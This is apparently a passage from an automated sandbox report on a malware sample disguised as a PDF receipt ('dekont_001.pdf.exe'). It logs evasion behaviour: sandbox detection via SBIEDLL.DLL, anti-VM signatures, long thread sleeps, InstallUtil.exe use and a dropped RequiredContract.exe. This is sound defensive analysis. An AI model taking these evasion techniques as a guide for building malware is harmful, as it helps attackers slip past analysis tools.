Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Memory allocated: 26A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Memory allocated: 4830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 10A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Memory allocated: 2F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Memory allocated: 3110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4AD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599736	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597202	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596960	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596857	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596744	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595964	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595637	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594649	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594294	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594148	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594046	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598115	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596030	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Window / User API: threadDelayed 1474	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Window / User API: threadDelayed 8374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3215	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6618	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Window / User API: threadDelayed 4681	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Window / User API: threadDelayed 5139	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 8107	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1753	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7372	Thread sleep count: 1474 > 30	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7372	Thread sleep count: 8374 > 30	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -99764s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -99546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -98765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -98650s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -98546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -98418s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -98307s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -98192s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -98029s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -97921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -97812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -97703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -97594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -97469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -97359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -97250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -97140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -97031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -96922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -96812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -96703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -96593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -96484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -96375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -96265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -96156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -96047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -95937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -95828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -95658s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -95544s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -95433s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -95316s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -95203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -95093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -94984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -94875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -94765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7340	Thread sleep time: -94651s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7544	Thread sleep count: 3215 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -599736s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -599594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7544	Thread sleep count: 6618 > 30	Jump to behavior
